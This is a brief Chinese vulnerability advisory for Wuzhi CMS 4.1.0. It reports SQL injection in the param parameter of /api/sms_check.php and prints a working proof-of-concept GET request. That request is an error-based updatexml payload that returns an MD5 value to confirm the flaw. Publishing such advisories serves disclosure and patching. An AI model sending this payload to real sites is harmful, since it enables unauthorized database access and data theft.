五指CMS系统sms_check.php文件param参数-SQL注入

日期: 2021-01-19 | 影响软件: 五指CMS | POC: 已公开

漏洞描述

【漏洞对象】五指CMS系统 【涉及版本】4.1.0 【漏洞描述】五指CMS系统的/api/sms_check.php文件param参数存在sql注入,可造成信息数据泄露,攻击者可利用该漏洞执行SQL指令,甚至入侵服务器。

PoC代码

GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20 HTTP/1.1

相关漏洞推荐